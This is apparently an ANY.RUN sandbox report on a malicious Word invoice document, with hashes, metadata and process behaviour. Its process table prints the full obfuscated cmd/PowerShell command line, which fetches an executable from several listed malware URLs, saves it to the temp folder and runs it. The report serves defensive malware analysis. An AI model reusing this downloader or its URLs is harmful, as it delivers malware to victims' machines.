analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | INV-HMP783924-593.doc |
| Full analysis: | https://app.any.run/tasks/f27cfa3c-63c3-476b-9074-8ffc27cbdf07 |
| Verdict: | Malicious activity |
| Analysis date: | January 17, 2019, 17:46:20 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 27 13:30:00 2018, Last Saved Time/Date: Tue Nov 27 13:30:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5: | 333120A224DD0DC463A419918B5C66CF |
| SHA1: | C1BD87333170005A0C3C54D8E525495DE48A6638 |
| SHA256: | 1AE7842209B64AFDFDA4A8E1C6AA0051934DC7AF5B6B709829AF0E9B70A6FB78 |
| SSDEEP: | 1536:okocn1kp59gxBK85fBm+aLUjl6lEZmV54BeHwzC:m41k/W48vRmV54eHwm |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2972)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2972)
SUSPICIOUS
Starts CMD.EXE for commands execution
- cmd.exe (PID: 2264)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2972)
Creates files in the user directory
- WINWORD.EXE (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (80) |
|---|
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:11:27 13:30:00 |
| ModifyDate: | 2018:11:27 13:30:00 |
| Pages: | 1 |
| Words: | 2 |
| Characters: | 13 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 14 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | PEFKpAAPiLKwbEkqzZdIEOupotKAwAw |
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INV-HMP783924-593.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 2264 | "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V/C"set G2J= }}{hctac}}kaerb;nBQ$ ssecorP-tratS;)nBQ$(elifotevas.sBi$;)ydoBesnopser.AXI$(etirw.sBi$;1 = epyt.sBi$;)(nepo.sBi${ )'*ZM*' ekil- txetesnopser.AXI$( fI;)(dnes.AXI$;)0,Hjo$,'TEG'(nepo.AXI${yrt{)ZRM$ ni Hjo$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = sBi$;'ptthlmx.2lmxsm' moc- tcejbO-weN= AXI$;)'exe.obw\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=nBQ$;)'@'(tilpS.'oR8bFMaj/db.moc.stessamt//:ptth@cwPJPpash/ur.bps.llerauqa//:ptth@PY2y7DIo/ni.gro.egellochtanhtnukab//:ptth@TKjxdxTSnx/gro.npscdma//:ptth@lIOhbE9NV/moc.elbon13//:ptth'=ZRM$;'wwO'=jJQ$ llehsrewop&&for /L %B in (560,-1,0)do set XYT=!XYT!!G2J:~%B,1!&&if %B leq 0 %LOCALAPPDATA:~-12,-11%o%OS:~0,-9%e%ProgramFiles(x86):~7,1%%ProgramFiles(x86):~15,-6%h%ProgramW6432:~-2,1%l%ProgramFiles(x86):~13,1% "!XYT:*XYT!=!" " | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2848 | C:\Windows\system32\cmd.exe /V/C"set G2J= }}{hctac}}kaerb;nBQ$ ssecorP-tratS;)nBQ$(elifotevas.sBi$;)ydoBesnopser.AXI$(etirw.sBi$;1 = epyt.sBi$;)(nepo.sBi${ )'*ZM*' ekil- txetesnopser.AXI$( fI;)(dnes.AXI$;)0,Hjo$,'TEG'(nepo.AXI${yrt{)ZRM$ ni Hjo$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = sBi$;'ptthlmx.2lmxsm' moc- tcejbO-weN= AXI$;)'exe.obw\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=nBQ$;)'@'(tilpS.'oR8bFMaj/db.moc.stessamt//:ptth@cwPJPpash/ur.bps.llerauqa//:ptth@PY2y7DIo/ni.gro.egellochtanhtnukab//:ptth@TKjxdxTSnx/gro.npscdma//:ptth@lIOhbE9NV/moc.elbon13//:ptth'=ZRM$;'wwO'=jJQ$ llehsrewop&&for /L %B in (560,-1,0)do set XYT=!XYT!!G2J:~%B,1!&&if %B leq 0 poWe%ProgramFiles(x86):~7,1%%ProgramFiles(x86):~15,-6%h%ProgramW6432:~-2,1%l%ProgramFiles(x86):~13,1% "!XYT:*XYT!=!" " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
Total events
1 083
Read events
755
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B5D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C231A293978C0BF5F9099FB6C7CA53B4 | SHA256:E9628B246FEE0C67CCEFA3DC6FD0A5A988D97D6F841FC6A6C3C47DAC4DB57BD7 | |||
| 2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$V-HMP783924-593.doc | pgc | |
MD5:269EC514CA9ADD70A24AE2A0D50AD2BE | SHA256:7067179BA96815E6D567CFE1266EA7BC6C2CB37B8D9A4AEEFBB6DC4440865C2C | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report